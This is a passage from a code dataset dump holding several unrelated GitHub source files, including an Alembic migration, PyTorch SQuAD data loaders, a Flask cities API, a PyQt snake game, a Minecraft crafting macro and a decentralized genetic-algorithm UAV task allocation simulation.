sa.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('board_id', sa.VARCHAR(length=36), nullable=True),\n sa.Column('name', sa.VARCHAR(length=36), nullable=False),\n sa.Column('description', sa.VARCHAR(length=250), nullable=False),\n sa.Column('is_active', sa.Enum('active', 'un_activate', name='isactiveenum'), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('deleted_at', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id_id')\n )\n op.create_index(op.f('ix_board_created_at'), 'board', ['created_at'], unique=False)\n op.create_index(op.f('ix_board_id_id'), 'board', ['id_id'], unique=False)\n op.create_index(op.f('ix_board_is_active'), 'board', ['is_active'], unique=False)\n op.create_table('team',\n sa.Column('id_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=20), nullable=False),\n sa.Column('password_hash', sa.String(length=150), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('about', sa.String(length=140), nullable=True),\n sa.Column('admin_name', sa.String(length=20), nullable=True),\n sa.Column('last_seen', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id_id'),\n sa.UniqueConstraint('name')\n )\n op.create_index(op.f('ix_team_email'), 'team', ['email'], unique=True)\n op.create_table('member',\n sa.Column('id_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=140), nullable=True),\n sa.Column('points', sa.Integer(), nullable=False),\n sa.Column('role', sa.String(length=36), nullable=False),\n sa.Column('board_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['board_id'], ['board.id_id'], ),\n sa.PrimaryKeyConstraint('id_id')\n )\n op.create_table('ticket',\n sa.Column('id_id', sa.Integer(), nullable=False),\n sa.Column('body', sa.String(length=140), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('points', sa.Integer(), nullable=False),\n sa.Column('status', sa.Integer(), nullable=False),\n sa.Column('board_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['board_id'], ['board.id_id'], ),\n sa.PrimaryKeyConstraint('id_id')\n )\n op.create_index(op.f('ix_ticket_timestamp'), 'ticket', ['timestamp'], unique=False)\n op.create_table('member_board',\n sa.Column('member_id', sa.Integer(), nullable=True),\n sa.Column('board_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['board_id'], ['board.id_id'], ),\n sa.ForeignKeyConstraint(['member_id'], ['member.id_id'], )\n )\n op.create_table('member_ticket',\n sa.Column('member_id', sa.Integer(), nullable=True),\n sa.Column('ticket_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['member_id'], ['member.id_id'], ),\n sa.ForeignKeyConstraint(['ticket_id'], ['ticket.id_id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('member_ticket')\n op.drop_table('member_board')\n op.drop_index(op.f('ix_ticket_timestamp'), table_name='ticket')\n op.drop_table('ticket')\n op.drop_table('member')\n op.drop_index(op.f('ix_team_email'), table_name='team')\n op.drop_table('team')\n op.drop_index(op.f('ix_board_is_active'), table_name='board')\n op.drop_index(op.f('ix_board_id_id'), table_name='board')\n op.drop_index(op.f('ix_board_created_at'), table_name='board')\n op.drop_table('board')\n # ### end Alembic commands ###\n","repo_name":"Sanjay-Adhitya/pro-man-api","sub_path":"migrations/versions/9bc06e50bc90_table_creations.py","file_name":"9bc06e50bc90_table_creations.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31210082625","text":"import random\n\nimport torch\nfrom torch.utils.data import DataLoader, TensorDataset\n\nfrom squad_utils import (convert_examples_to_features_answer_id,\n convert_examples_to_harv_features,\n read_squad_examples)\n\n\ndef get_squad_data_loader(tokenizer, file, shuffle, args,query_list):\n examples = read_squad_examples(file, is_training=True, debug=args.debug)\n features = convert_examples_to_features_answer_id(examples,\n tokenizer=tokenizer,\n max_seq_length=args.max_c_len,\n max_query_length=args.max_q_len,\n max_ans_length=args.max_q_len,\n doc_stride=128,\n is_training=True)\n all_index_ids = torch.tensor([f.unique_id for f in features], dtype=torch.long)\n all_q_ids = torch.tensor([f.q_ids for f in features], dtype=torch.long)\n # unique_qa_ids = np.unique([f.unique_id for f in features])\n #chosen_qa_ids = np.random.choice(unique_qas, size=15, replace=False)\n chosen_q_ids = []\n for query in query_list:\n index = query[0]\n index_in_all = (all_index_ids == int(index)).nonzero(as_tuple=True)[0] # Reference: https://stackoverflow.com/questions/47863001/how-pytorch-tensor-get-the-index-of-specific-value\n chosen_q_ids.append((all_q_ids[index_in_all,:],index))\n all_c_ids = torch.tensor([f.c_ids for f in features], dtype=torch.long)\n all_tag_ids = torch.tensor([f.tag_ids for f in features], dtype=torch.long)\n all_a_ids = (all_tag_ids != 0).long()\n all_start_positions = torch.tensor([f.noq_start_position for f in features], dtype=torch.long)\n all_end_positions = torch.tensor([f.noq_end_position for f in features], dtype=torch.long)\n data = TensorDataset(all_index_ids,all_c_ids,all_a_ids, all_start_positions, all_end_positions)\n data_loader = DataLoader(data, shuffle=False, batch_size=args.batch_size)\n\n return data_loader,examples, chosen_q_ids\n\ndef get_harv_data_loader(tokenizer, file, shuffle, ratio, args):\n examples = read_squad_examples(file, is_training=True, debug=args.debug)\n random.shuffle(examples)\n num_ex = int(len(examples) * ratio)\n examples = examples[:num_ex]\n features = convert_examples_to_harv_features(examples,\n tokenizer=tokenizer,\n max_seq_length=args.max_c_len,\n max_query_length=args.max_q_len,\n doc_stride=128,\n is_training=True)\n all_c_ids = torch.tensor([f.c_ids for f in features], dtype=torch.long)\n dataset = TensorDataset(all_c_ids)\n dataloader = DataLoader(dataset, shuffle=shuffle, batch_size=args.batch_size)\n\n return features, dataloader\n\ndef batch_to_device(batch, device):\n batch = (b.to(device) for b in batch)\n c_ids, q_ids, a_ids, start_positions, end_positions = batch\n\n c_len = torch.sum(torch.sign(c_ids), 1)\n max_c_len = torch.max(c_len)\n c_ids = c_ids[:, :max_c_len]\n a_ids = a_ids[:, :max_c_len]\n\n q_len = torch.sum(torch.sign(q_ids), 1)\n max_q_len = torch.max(q_len)\n q_ids = q_ids[:, :max_q_len]\n\n return c_ids, q_ids, a_ids, start_positions, end_positions\n","repo_name":"AyushModi/COMP0138","sub_path":"model training code/RankingGen2/vae/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28055422787","text":"#!/usr/bin/python3\n\"\"\"RESTful API action for City object\"\"\"\n\nfrom flask import abort, jsonify, request\nfrom api.v1.views import app_views\nfrom models.city import City\nfrom models.state import State\nfrom models import storage, storage_t\n\n\n@app_views.route('/states//cities', methods=[\"GET\"])\ndef cities_get(state_id):\n \"\"\"\n get city in state if state_id is specified\n \"\"\"\n state = storage.get(State, state_id)\n if state:\n cities = [city.to_dict() for city in state.cities]\n return jsonify(cities)\n else:\n abort(404)\n\n\n@app_views.route('/cities/', methods=[\"GET\"])\ndef city_get(city_id):\n \"\"\"\n \"\"\"\n city = storage.get(City, city_id)\n if city:\n return jsonify(city.to_dict())\n else:\n abort(404)\n\n\n@app_views.route('cities/', methods=[\"DELETE\"])\ndef cities_delete(city_id):\n \"\"\"\n delete method handler.\n will delete a city with the specified id.\n \"\"\"\n city = storage.get(City, city_id)\n\n if city:\n storage.delete(city)\n storage.save()\n return jsonify({})\n else:\n abort(404)\n\n\n@app_views.route('/states//cities', methods=['POST'])\ndef city_post(state_id):\n \"\"\"\n route handler for creating a new city\n \"\"\"\n state = storage.get(State, state_id)\n if not state:\n abort(404)\n if not request.is_json:\n return \"Not a JSON\", 400\n new_city = request.get_json().get('name')\n if new_city is None:\n return \"Missing name\", 400\n city = City(name=new_city, state_id=state_id)\n city.save()\n return jsonify(city.to_dict()), 201\n\n\n@app_views.route('/cities/', methods=['PUT'])\ndef city_put(city_id):\n \"\"\"\n Returns the City object with the status code 200\n \"\"\"\n if not request.is_json:\n return \"Not a JSON\", 400\n data = request.get_json()\n city = storage.get(City, city_id)\n\n if city is None:\n abort(404)\n\n for key, value in data.items():\n if key in ('id', 'state_id', 'created_at', 'updated_at'):\n continue\n else:\n setattr(city, key, value)\n\n city.save()\n return jsonify(city.to_dict()), 200\n","repo_name":"coderoyalty/AirBnB_clone_v3","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"25737864041","text":"from random import choice\n\nfrom PyQt5.QtCore import QRectF\nfrom PyQt5.QtCore import Qt\n\nfrom PyQt5.QtGui import QBrush\nfrom PyQt5.QtGui import QColor\nfrom PyQt5.QtGui import QPainter\n\nfrom PyQt5.QtWidgets import QGraphicsItem\nfrom PyQt5.QtWidgets import QStyleOptionGraphicsItem\nfrom PyQt5.QtWidgets import QWidget\n\nfrom modules.food import Food\n\nclass Snake(QGraphicsItem):\n\n def __init__(self, parent: object) -> None:\n super(Snake, self).__init__()\n self.parent = parent.canvas\n self.particleSize = parent.particleSize\n\n # Random direction at the start\n directions = [[self.particleSize, 0], [-self.particleSize, 0], [0, self.particleSize], [0, -self.particleSize]]\n self.direction = choice(directions)\n\n # Initial position of the Snake head\n width = range(self.particleSize, int(self.parent.width()) - self.particleSize * 2, self.particleSize)\n height = range(self.particleSize, int(self.parent.height()) - self.particleSize * 2, self.particleSize)\n self.body = [[width[int(len(width) / 2)], height[int(len(height) / 2)]]]\n\n def ateFood(self, food: Food) -> bool:\n \"\"\"\n Compare the snake's head position with the food\n \"\"\"\n head = self.body[0]\n\n if food is not None and food.x() == head[0] and food.y() == head[1]:\n self.grow()\n self.parent.removeItem(food)\n return True\n\n return False\n\n def grow(self) -> None:\n \"\"\"\n Take the last element of the list, and reinsert it as the last element\n \"\"\"\n self.body.append(self.body[-1])\n\n def headInsideOfTail(self) -> bool:\n \"\"\"\n Check if the head of the snake has collided with its own body\n \"\"\"\n return len(self.body) > 2 and self.body[0] in self.body[1:]\n\n def outOfBounds(self) -> bool:\n \"\"\"\n Check if the snake collided with the boundaries\n \"\"\"\n width = self.parent.width()\n height = self.parent.height()\n head = self.body[0]\n\n return head[0] > (width - self.particleSize * 2) or \\\n head[0] < self.particleSize or \\\n head[1] > (height - self.particleSize * 2) or \\\n head[1] < self.particleSize\n\n def changeDirection(self, key: int) -> None:\n \"\"\"\n Change the Snake's direction according to the key the user has pressed\n \"\"\"\n if key in [Qt.Key_A, Qt.Key_Left] and self.direction != [self.particleSize, 0]:\n self.direction = [-self.particleSize, 0]\n elif key in [Qt.Key_D, Qt.Key_Right] and self.direction != [-self.particleSize, 0]:\n self.direction = [self.particleSize, 0]\n elif key in [Qt.Key_S, Qt.Key_Down] and self.direction != [0, -self.particleSize]:\n self.direction = [0, self.particleSize]\n elif key in [Qt.Key_W, Qt.Key_Up] and self.direction != [0, self.particleSize]:\n self.direction = [0, -self.particleSize]\n\n def paint(self, painter: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget) -> None:\n brush = QBrush(QColor(76, 175, 79), Qt.Dense3Pattern)\n painter.setPen(Qt.NoPen)\n painter.setBrush(brush)\n\n for i in range(len(self.body)):\n painter.drawRect(self.body[i][0], self.body[i][1], self.particleSize, self.particleSize)\n\n # Move Snake\n # Take head and move it around according to the direction\n head = [sum(x) for x in zip(self.body[0], self.direction)]\n # Remove the last element of the list\n self.body.pop()\n # Insert the new head\n self.body.insert(0, head)\n\n def boundingRect(self) -> QRectF:\n return QRectF(0, 0, self.parent.width(), self.parent.height())\n","repo_name":"rhacs/Lindworm","sub_path":"modules/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"18583357211","text":"import tkinter as tk\r\n\r\nfrom tkinter import *\r\n\r\napp = tk.Tk()\r\napp.title(\"Practica 11\")\r\netiqueta = Label(app, text=\"Hola a Todos!!!\")\r\nboton = Button(app, text=\"OK!!\")\r\n\r\netiqueta.pack()\r\nboton.pack()\r\napp.mainloop()\r\n\r\n\r\n","repo_name":"BubbleLM-prog/LPC-SCRIPTS","sub_path":"practica11.2.py","file_name":"practica11.2.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20188087564","text":"path = \"F:/Minecraft/jsMacros/Macros/libs/\"\nexecfile(path + \"grab.py\")\nexecfile(path + \"dump.py\")\nexecfile(path + \"deposit.py\")\nexecfile(path + \"recipes.py\")\nexecfile(path + \"autoCraft.py\")\nexecfile(path + \"resetFocus.py\")\nexecfile(path + \"countItems.py\")\n\n# example crafting helper\n# waits for the player to click on correct chests/crafting tables\n# tendency to break if the wrong things are clicked\n\nwhile countItems(\"minecraft:oak_log\") < 512:\n chat.log(\"looking for {} logs...\".format(512-countItems(\"minecraft:oak_log\")))\n while hud.getOpenScreen() == None:\n client.waitTick()\n grab(\"minecraft:oak_log\", number=512, onlyFullStacks=True, click=False)\n\nchat.log(\"need crafting bench...\")\nwhile not hud.getOpenScreenName() == \"Crafting Table\":\n client.waitTick()\n\ninv = player.openInventory()\nslots = inv.getMap()\n\nautoCraft(recipes[\"oak_planks\"], inv, slots, 8)\nautoCraft(recipes[\"oak_chest\"], inv, slots, 4)\n\ninv.close()\ntime.sleep(250)\nresetFocus()\n\nchat.log(\"need dropoff chest...\")\nwhile hud.getOpenScreen() == None:\n client.waitTick()\n\ndump(\"minecraft:chest\")\ntime.sleep(100)\nchat.log(\"done!\")\n","repo_name":"TheOrangeWizard/jsmacros","sub_path":"bots/craft_chests.py","file_name":"craft_chests.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"34889612758","text":"import random\nimport time\nimport math\nimport numpy as np\nimport threading\nimport queue\nfrom dubins_model import *\nfrom matplotlib import pyplot as plt\nimport multiprocessing as mp\nimport copy\n\n\nclass UAV(object):\n def __init__(self, uav_id, uav_site, uav_specification):\n self.uav_id = uav_id\n self.x0 = uav_site[0]\n self.y0 = uav_site[1]\n self.theta0 = uav_site[2]\n self.velocity = uav_specification[0]\n self.Rmin = uav_specification[1]\n self.omega_max = self.velocity / self.Rmin\n\n\n# thread 1\ndef GA_thread(uav, targets_sites, ga2control_queue, control2ga_queue):\n # configuration\n uav_site = [uav.x0, uav.y0]\n targets_sites = targets_sites\n targets_num = len(targets_sites)\n # initial mapping\n\n def distance_cost(node1, node2):\n return np.sqrt((node2[0] - node1[0]) ** 2 + (node2[1] - node1[1]) ** 2)\n\n cost_matrix = [\n (lambda x: [distance_cost(targets_sites[x], targets_sites[y]) for y in range(targets_num)])(z)\n for z in range(targets_num)]\n uav2targets = [[distance_cost(targets_sites[_], uav_site) for _ in range(targets_num)]]\n targets2origin = [[distance_cost(targets_sites[_], uav_site) for _ in range(targets_num)]]\n # other uav information\n all_agents_id = [uav.uav_id]\n all_agents_information = [[uav.velocity, uav.Rmin, uav_site[0], uav_site[1]]]\n # communication\n ga2control_port = ga2control_queue\n control2ga_port = control2ga_queue\n # GA parameters\n pop_size = 100\n crossover_prob = 1\n mutation_prob = 0.7\n crossover_num = 66\n mutation_num = 32\n elitism_num = 4\n task_status_list = [1 for _ in range(targets_num)]\n\n def fitness_evaluate(pop):\n def fitness_function(total_cost):\n return 1 / (max(total_cost) + 0.01 * sum(total_cost))\n\n fitness_value = []\n for index, chromosome in enumerate(pop):\n cost, pre_location = [0 for _ in range(len(all_agents_id))], [0 for _ in range(len(all_agents_id))]\n for n in range(len(chromosome[0])):\n a = all_agents_id.index(chromosome[1][n])\n target = chromosome[0][n]\n if not pre_location[a] == 0:\n cost[a] += cost_matrix[pre_location[a]-1][target-1] / all_agents_information[a][0]\n else:\n cost[a] += uav2targets[a][target-1] / all_agents_information[a][0]\n pre_location[a] = target\n cost = np.add(cost, [targets2origin[m][pre_location[m]-1] / all_agents_information[m][0]\n for m in range(len(cost))])\n fitness_value.append(fitness_function(cost))\n return fitness_value\n\n def generate_population():\n def generate_chromosome():\n chromosome = [[i + 1 for i in range(targets_num)],\n [random.choice(all_agents_id) for _ in range(targets_num)]]\n random.shuffle(chromosome[0])\n return chromosome\n\n return [generate_chromosome() for _ in range(pop_size)]\n\n def roulette_wheel(fit):\n return np.array(fit) / np.sum(fit)\n\n def selection(roulette__wheel, num):\n return np.random.choice(np.arange(len(roulette__wheel)), size=num, replace=False, p=roulette__wheel)\n\n def crossover(parent_1, parent_2):\n targets_number = sum(task_status_list)\n child_1, child_2 = [[], []], [[], []]\n if random.random() <= crossover_prob:\n try:\n cutpoint = random.sample(range(targets_number), 2)\n cutpoint.sort()\n remain_1, remain_2 = [[], []], [[], []]\n # order crossover\n for i in range(targets_number):\n if parent_2[0][i] not in parent_1[0][cutpoint[0]:cutpoint[1]]:\n remain_1[0].append(parent_2[0][i])\n remain_1[1].append(parent_2[1][i])\n if parent_1[0][i] not in parent_2[0][cutpoint[0]:cutpoint[1]]:\n remain_2[0].append(parent_1[0][i])\n remain_2[1].append(parent_1[1][i])\n for i in range(2):\n child_1[i].extend(\n remain_1[i][:cutpoint[0]] + parent_1[i][cutpoint[0]:cutpoint[1]] + remain_1[i][cutpoint[0]:])\n child_2[i].extend(\n remain_2[i][:cutpoint[0]] + parent_2[i][cutpoint[0]:cutpoint[1]] + remain_2[i][cutpoint[0]:])\n return [child_1, child_2]\n except:\n return [parent_1, parent_2]\n else:\n return [parent_1, parent_2]\n\n def mutation(chromosome):\n gene = [[], []]\n if random.random() <= mutation_prob:\n if random.random() <= 0.5 and not len(all_agents_id) == 1: # mutate agent\n try:\n mutpoint = random.randint(0, sum(task_status_list) - 1)\n assign = random.choice([i for i in all_agents_id if i not in [chromosome[1][mutpoint]]])\n gene[0].extend(chromosome[0][:])\n gene[1].extend(chromosome[1][:mutpoint] + [assign] + chromosome[1][mutpoint + 1:])\n return gene\n except:\n return chromosome\n else: # inverse mutation\n try:\n cutpoint = random.sample(range(sum(task_status_list)), 2)\n cutpoint.sort()\n for i, row in enumerate(chromosome):\n inverse_gene = row[cutpoint[0]:cutpoint[1]]\n inverse_gene.reverse()\n gene[i].extend(row[:cutpoint[0]] + inverse_gene + row[cutpoint[1]:])\n return gene\n except:\n return chromosome\n else:\n return chromosome\n\n def elitism(pop, fit):\n ranking = sorted(range(len(pop)), key=lambda f: fit[f], reverse=True)[:elitism_num]\n return [pop[_] for _ in ranking]\n\n def substitute(pop, fit, new_pop, new_fit):\n for i in range(len(new_pop)):\n if new_fit[i] > min(fit):\n pop[np.argmin(fit)] = new_pop[i]\n fit[np.argmin(fit)] = new_fit[i]\n\n def uav_information_adjust(msg, pop):\n new_agent_set, task_executed_set = [], []\n task_complete = False\n # ga.all_agents_id = [ga.uav.uav_id]\n # ga.all_agents_information = [[ga.uav.velocity, ga.uav.Rmin, ga.uav_site[0], ga.uav_site[1]]]\n for packet in msg:\n if packet[0] not in all_agents_id: # find new agent\n all_agents_id.append(packet[0])\n all_agents_information.append(packet[1:5])\n uav2targets.append([])\n new_agent_set.append(packet[0])\n targets2origin.append([distance_cost(targets_sites[_], uav_site) for _ in range(targets_num)])\n else: # update current location\n uav_index = all_agents_id.index(packet[0])\n all_agents_information[uav_index][2:] = packet[3:5]\n if not packet[-1] == task_status_list:\n task_complete = True\n for agent in range(len(uav2targets)): # adjust uav to targets cost\n uav2targets[agent] = [distance_cost(targets_sites[_], all_agents_information[agent][2:])\n for _ in range(targets_num)]\n # update complete task\n for packet in msg:\n for i, task in enumerate(packet[-1]):\n if task == 0:\n task_status_list[i] = 0\n if task_complete:\n for chromosome in pop:\n for i, gene in enumerate(chromosome[0]):\n if task_status_list[gene-1] == 0:\n del chromosome[0][i], chromosome[1][i]\n for packet in msg:\n for i, gene in enumerate(packet[5][0]):\n if task_status_list[gene-1] == 0:\n del packet[5][0][i], packet[5][1][i]\n pop.append(packet[5])\n else:\n for packet in msg:\n pop.append(packet[5])\n if not new_agent_set == []:\n for chromosome in pop:\n chromosome[1] = [random.choice(all_agents_id) for _ in range(len(chromosome[0]))]\n\n def ga_chromosome2task_execution(pop, fit):\n ga2control_port.put(pop[fit.index(max(fit))])\n\n def others_information2ga_thread(pop, fit):\n try:\n subpop = control2ga_port.get()\n uav_information_adjust(subpop, pop)\n fit = fitness_evaluate(pop)\n except queue.Empty:\n pass\n return pop, fit\n\n # initial setting\n broadcast_interval = 1\n previous_time = time.time()\n y = 0\n # start algorithm\n population = generate_population()\n fitness = fitness_evaluate(population)\n while True:\n y += 1\n wheel = roulette_wheel(fitness)\n new_population = []\n new_population.extend(elitism(population, fitness))\n for cross in range(0, pop_size-len(new_population), 2):\n parents = selection(wheel, 2)\n offspring = crossover(population[parents[0]], population[parents[1]])\n new_population.extend([mutation(offspring[0])])\n new_population.extend([mutation(offspring[1])])\n new_fitness = fitness_evaluate(new_population)\n population = new_population\n # if max(new_fitness) > max(fitness):\n # print(f'{uav.uav_id}__cost:{1 / max(new_fitness)}')\n fitness = new_fitness\n if (time.time() - previous_time) >= broadcast_interval:\n # uav = [[]for _ in range(len(all_agents_id))]\n # g = population[fitness.index(max(fitness))]\n # for i in range(len(g[0])):\n # uav[g[1][i]-1].append(g[0][i]-1)\n # x = [[all_agents_information[_][2]]for _ in range(len(all_agents_id))]\n # y = [[all_agents_information[_][3]]for _ in range(len(all_agents_id))]\n # for w, uu in enumerate(uav):\n # for t in uu:\n # x[w].append(targets_sites[t][0])\n # y[w].append(targets_sites[t][1])\n # plt.plot(x[w], y[w], '-')\n # plt.plot()\n # for task in targets_sites:\n # plt.plot(task[0], task[1], 'ro')\n # plt.show()\n\n ga_chromosome2task_execution(population, fitness)\n population, fitness = others_information2ga_thread(population, fitness)\n previous_time = time.time()\n print(f'y={y}')\n y = 0\n\n\ndef TaskSequenceExecution(uav, targets_sites, communication, ga2control_queue, control2ga_queue, u2g):\n # configuration\n uav = uav\n uav_site = [uav.x0, uav.y0]\n targets_sites = targets_sites\n targets_sites.append([uav.x0, uav.y0])\n # communication queue (broadcast and receive port between agents)\n communication = communication\n # communication between ga thread and task execution thread\n ga2control_port = ga2control_queue\n control2ga_port = control2ga_queue\n # u2g for results\n gcs = u2g\n task_status_list = [1 for _ in range(len(targets_sites)-1)]\n\n def decode_chromosome(chromosome):\n task_sequence = []\n for i, gene in enumerate(chromosome[1]):\n if gene == uav.uav_id:\n task_sequence.append(targets_sites[chromosome[0][i] - 1])\n task_sequence.append([uav.x0, uav.y0])\n return task_sequence\n\n def pack_chromosome(chromosome):\n # print(task_status_list)\n return [uav.uav_id, uav.velocity, uav.Rmin, uav_site[0], uav_site[1],\n chromosome, task_status_list]\n\n # build uav\n u = 0\n t = 0\n xn = uav.x0\n yn = uav.y0\n theta = uav.theta0\n list_for_u = [0]\n list_for_t = [0]\n task_allocation = []\n c = 0.1\n actual_x = [uav.x0]\n actual_y = [uav.y0]\n armed = False\n disarmed = False\n complete = False\n waypoint_radius = 50\n # communication setting\n broadcast_list = [i for i in range(len(communication)) if not i+1 == uav.uav_id]\n plot_time = 0\n # print(f'{uav.uav_id} broadcast_list: {broadcast_list}')\n previous_time = 0\n while True:\n # ---------------------- communication part ------------------------- #\n try:\n if not ga2control_port.empty():\n # get current best solution (from ga thread)-----------\n current_best_chromosome = ga2control_port.get(timeout=1)\n # print(f'uav{uav.uav_id}::best_solution:{ga_solution}')\n # if got current best solution from ga thread----------\n task_allocation = decode_chromosome(current_best_chromosome)\n print(f'UAV_{uav.uav_id} current_best: {current_best_chromosome}')\n # print(f'uav{uav.uav_id}_tasks:{task_allocation}')\n broadcast_packet = pack_chromosome(current_best_chromosome)\n # broadcast packet-------------------------------------\n for q in broadcast_list:\n communication[q].put(broadcast_packet)\n # get other uav information (xbee)---------------------\n receive_from_v2v = []\n while not len(receive_from_v2v) == len(communication)-1:\n try:\n v2v_message = communication[uav.uav_id - 1].get(timeout=1)\n receive_from_v2v.append(v2v_message)\n # update terminal task--------------------------\n for task, check in enumerate(v2v_message[-1]):\n if check == 0:\n task_status_list[task] = 0\n except queue.Empty:\n pass\n # give it to ga thread-----------------------------------\n control2ga_port.put(receive_from_v2v + [broadcast_packet])\n except queue.Empty:\n pass\n # ---------------------- control part ---------------------------- #\n if not task_allocation == [] and not armed: # first command\n armed = True\n print(f'UAV_{uav.uav_id} arm !!')\n previous_time = time.time() # mission start time\n\n if not armed or complete:\n continue\n else:\n # plot animation\n if time.time() - plot_time >= 0.5:\n gcs.put([uav.uav_id, xn, yn])\n plot_time = time.time()\n # print(task_allocation)\n assign = 0\n while distance_between_points([xn, yn], task_allocation[assign]) <= waypoint_radius:\n if task_allocation[assign] == [uav.x0, uav.y0]:\n actual_x.append(task_allocation[assign][0])\n actual_y.append(task_allocation[assign][1])\n disarmed = True\n task_allocation.clear()\n break\n task_status_list[targets_sites.index(task_allocation[0])] = 0\n # print(f'target: {task_allocation[0]} completed by uav{uav.uav_id}')\n assign += 1\n if disarmed:\n # gcs.put([uav.uav_id, actual_x, actual_y, list_for_t])\n print(f'UAV_{uav.uav_id} mission complete !!!!!!!!!!!!!!')\n armed = False\n complete = True\n elif distance_between_points([xn, yn], task_allocation[assign]) > waypoint_radius:\n angle_between_two_points = angle_between((xn, yn), task_allocation[assign][:2])\n dt = (time.time() - previous_time)\n previous_time = time.time()\n xn, yn, thetan = step(uav, xn, yn, theta, u, dt)\n relative_angle = angle_between_two_points - thetan\n error_of_heading = relative_angle if abs(relative_angle) <= 2 * pi - abs(relative_angle) \\\n else -(relative_angle / abs(relative_angle)) * (2 * pi - abs(relative_angle))\n if c >= error_of_heading >= -c:\n u = 0\n theta = thetan\n elif error_of_heading < -c:\n u = -1\n theta = thetan\n\n elif error_of_heading > c:\n u = 1\n theta = thetan\n else:\n u = 1\n theta = thetan\n\n actual_x.append(xn)\n actual_y.append(yn)\n t += dt\n list_for_u.append(u)\n list_for_t.append(t)\n\n uav_site = [xn, yn] # update current position\n\n\nif __name__ == '__main__':\n uav_position = [[1500, 0, np.pi/2], [-1500, 0, np.pi/2], [0, 0, np.pi/2]]\n # uav_position = [[0, 0, np.pi / 2]]\n uav_configuration = [[25, 75], [15, 50], [35, 100]]\n # uav_configuration = [[1, 2]]\n uav_num = len(uav_configuration)\n targets = [[-65,15],[27,66],[-51,58],[77,77],[0,39],\n [71,95],[-25,10],[0,91],[30,30],[-100,24],[38,75]]\n # targets = [[random.randint(-100, 100), random.randint(20, 100)] for _ in range(20)]\n targets = [list(np.array(task)*20) for task in targets]\n broadcast = [mp.Queue() for _ in range(uav_num)]\n control2ga_thread = [mp.Queue() for _ in range(uav_num)]\n ga2control_thread = [mp.Queue() for _ in range(uav_num)]\n GCS = mp.Queue()\n # build uav\n UAVs = [UAV(a + 1, uav_position[a], uav_configuration[a]) for a in range(uav_num)]\n # GA\n GA_threads = [mp.Process(target=GA_thread, args=(UAVs[a], targets, ga2control_thread[a], control2ga_thread[a]))\n for a in range(uav_num)]\n # control and communication\n TaskSequenceExecution_threads = [mp.Process(target=TaskSequenceExecution,\n args=(UAVs[a], targets, broadcast,\n ga2control_thread[a], control2ga_thread[a], GCS))\n for a in range(uav_num)]\n for a in range(uav_num):\n GA_threads[a].start()\n TaskSequenceExecution_threads[a].start()\n for t in targets:\n plt.plot(t[0], t[1], 'ko', markerfacecolor='none', markersize=8)\n for u in uav_position:\n plt.plot(u[0], u[1], 'r^', markerfacecolor='none', markersize=8)\n color_style = ['tab:blue', 'tab:green', 'tab:orange']\n while True:\n try:\n surveillance = GCS.get(timeout=1e-5)\n # print(surveillance)\n plt.plot(surveillance[1], surveillance[2], 'o', color=color_style[surveillance[0]-1], markersize=1)\n plt.pause(1e-10)\n except queue.Empty:\n pass\n # plot results\n # for data in result:\n # plt.plot(data[1], data[2], '-')\n # for t in targets:\n # plt.plot(t[0], t[1], 'bo')\n # for u in uav_position:\n # plt.plot(u[0], u[1], 'ro')\n # plt.show()\n","repo_name":"jerryfungi/Multi-UAV_Task_Allocation","sub_path":"decentralized_GA_VRP.py","file_name":"decentralized_GA_VRP.py","file_ext":"py","file_size_in_byte":18926,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"38219388810","text":"def _process_ratings(ratings):\n p_ratings = []\n for r in ratings:\n rating = r.strip(' ').strip('%').split('/')[0]\n if rating == '100':\n rating = 10\n elif float(rating) > 10:\n rating = float(f'{rating[0]}.{rating[1]}')\n else:\n rating = float(rating)\n p_ratings.append(rating)\n return p_ratings\n\n\ndef process_item(item):\n try:\n item['name'] = item['name'].rstrip(' ')\n item['description'] = item['description'].rstrip(' ')\n item['ratings'] = _process_ratings(item['ratings'])\n\n item['season_or_year'] = item['season_or_year'].strip(' (').strip(')')\n item['genre'] = item['genre'].lower().strip(' ').split(',')\n item['cast'] = item['cast'].rstrip(' ').split(', ')\n item['runtime'] = item['runtime'].strip(' ')\n item['language'] = item['language'].lower().strip(' ').split(',')\n item['awards'] = item.get('awards', '').rstrip(r'.\\t')\n item['director'] = item.get('director', '').split(', ')\n\n return item\n except KeyError:\n return item\n","repo_name":"ranzvi/netflix-app","sub_path":"netflix_app/utils/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20608488836","text":"#!/usr/bin/python3\n\"\"\"\nTest detection of face construction with 68 point predictor\nAuthor: Mikołaj Machowski, 2019\nLicense: 